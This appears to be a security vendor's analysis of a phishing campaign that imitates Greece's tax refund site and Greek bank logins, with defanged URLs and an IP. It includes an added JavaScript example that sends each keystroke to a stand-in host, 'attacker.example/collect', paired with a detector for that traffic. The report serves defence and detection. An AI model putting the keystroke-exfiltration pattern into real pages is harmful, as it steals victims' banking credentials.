During our routine threat-hunting exercise, Cyble Research & Intelligence Labs (CRIL) came across multiple URLs hosting pages pretending to be Greece’s tax refund site. The page mentions the tax refund amount and asks users to confirm their current account number to transfer funds. The page tricks users into providing their net banking credentials through this process.
Phishing Pages Analysis
The figure below shows the phishing site with the official logo of the Greek Government website.
When a user visits either of the URLs hxxp://mygov-refund[.]me/ret/tax or hxxps://govgr-tax[.]me/ret/tax, the page asks them to confirm the account number to which the tax refund should be transferred.
The user is then asked to select their bank from a list of seven major Greek banks, including the National Bank of Greece, Alpha Bank, and WinBank.
Once a bank is selected, the site redirects the user to a page containing a fake net banking login UI that imitates the legitimate login page of the chosen bank.
The below image depicts the fake login UI hosted on the URL: hxxp://mygov-refund[.]me/bg/internet banking/tax pretending to be the National Bank of Greece’s net banking page.
The below image shows the fake login UI hosted on the URL: hxxp://mygov-refund[.]me/alpha/internet banking/tax, which pretends to be the Alpha Bank net banking page.
The image below shows the network request generated as soon as keystrokes are entered into a text field on the phishing site.
Based on our investigation, CRIL observed that the IP address: 195.178.120[.]25 has been used as a base to host various malicious domains containing phishing pages related to tax refunds in Greece. The complete list of phishing sites can be found in the IOC section of this analysis.
Upon further investigation, we determined that this campaign started through phishing emails targeting Greek taxpayers.
Phishing remains one of the most commonly used tactics leveraged by Threat Actors to harvest personal and financial information. In this particular case, we observed the TAs using a technique that steals whatever is typed into the text fields of their phishing pages without any further user action (such as clicking “Submit”).
This is a rarely seen feature: because credentials are captured with minimal input from the user, even partially typed or abandoned logins reach the attacker, which makes the campaign harder to detect and analyze from the victim's side.
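The following is an added example, not code recovered from the campaign, that models the behaviour described above: a login page that POSTs a field's contents on every keystroke, and a defender-side check that recognises the resulting request pattern. The `FakeInputField` class and the injected `send` callback are constructed stand-ins for the DOM and `fetch()` so that it runs offline, and the collection endpoint `https://attacker.example/collect` is an assumption.

```javascript
// Added example (not the campaign's recovered script): how a phishing page can
// exfiltrate a text field's contents on every keystroke, with no Submit click,
// and how a defender can recognise the resulting request pattern.
// FakeInputField and `send` are constructed stand-ins for the DOM and fetch();
// the endpoint URL is an assumption.

// Minimal stand-in for an <input> element: supports addEventListener and
// simulates typing by firing an "input" event after each character.
class FakeInputField {
  constructor(name) {
    this.name = name;
    this.value = "";
    this.listeners = { input: [] };
  }
  addEventListener(type, fn) {
    this.listeners[type].push(fn);
  }
  type(text) {
    for (const ch of text) {
      this.value += ch;
      for (const fn of this.listeners.input) fn({ target: this });
    }
  }
}

// Attacker-side behaviour: on every "input" event, POST the field's current
// value. `send(url, body)` stands in for fetch()/navigator.sendBeacon(); it is
// injected so the example runs offline and the requests can be inspected.
function attachKeystrokeExfil(field, send, endpoint) {
  field.addEventListener("input", (ev) => {
    send(endpoint, { field: ev.target.name, value: ev.target.value });
  });
}

// Simulate a victim typing a username and password into the fake login UI.
// Returns the outbound requests the page generated, one per keystroke.
function simulateVictim(endpoint, user, pass) {
  const requests = [];
  const send = (url, body) => requests.push({ url, body: { ...body } });
  const userField = new FakeInputField("username");
  const passField = new FakeInputField("password");
  attachKeystrokeExfil(userField, send, endpoint);
  attachKeystrokeExfil(passField, send, endpoint);
  userField.type(user);
  passField.type(pass);
  return requests;
}

// Defender-side check: per-keystroke exfiltration shows up as a run of POSTs
// to the same URL and field whose bodies grow by exactly one character each
// time. Returns the URLs that exhibit at least `minRun` such consecutive requests.
function detectPerKeystrokeExfil(requests, minRun = 4) {
  const flagged = new Set();
  const lastByKey = new Map(); // "url|field" -> { value, run }
  for (const r of requests) {
    const key = `${r.url}|${r.body.field}`;
    const prev = lastByKey.get(key);
    const grows =
      prev &&
      r.body.value.length === prev.value.length + 1 &&
      r.body.value.startsWith(prev.value);
    const run = grows ? prev.run + 1 : 1;
    lastByKey.set(key, { value: r.body.value, run });
    if (run >= minRun) flagged.add(r.url);
  }
  return [...flagged];
}

// Demonstration run with constructed credentials.
const reqs = simulateVictim("https://attacker.example/collect", "maria", "S3cret!");
console.log(`${reqs.length} requests sent; last body:`, reqs[reqs.length - 1].body);
console.log("flagged endpoints:", detectPerKeystrokeExfil(reqs));
```

The defender check is the practical takeaway: although no Submit is needed, the technique produces one outbound request per keystroke to the same endpoint, which is a distinctive pattern in web-proxy or browser network logs that a normal login flow (one POST per attempt) does not produce.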
Cyble Research & Intelligence Labs actively monitors new malicious phishing campaigns to keep our readers updated with our latest findings about phishing and other types of data theft attacks.
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:
- Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
- Regularly monitor your financial transactions, and if you notice any suspicious activity, contact your bank immediately.
- Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
|---|---|---|
| Initial Access | T1566 | Phishing |
| Collection | T1056.001 | Input Capture: Keylogging |
Indicators of Compromise (IOCs)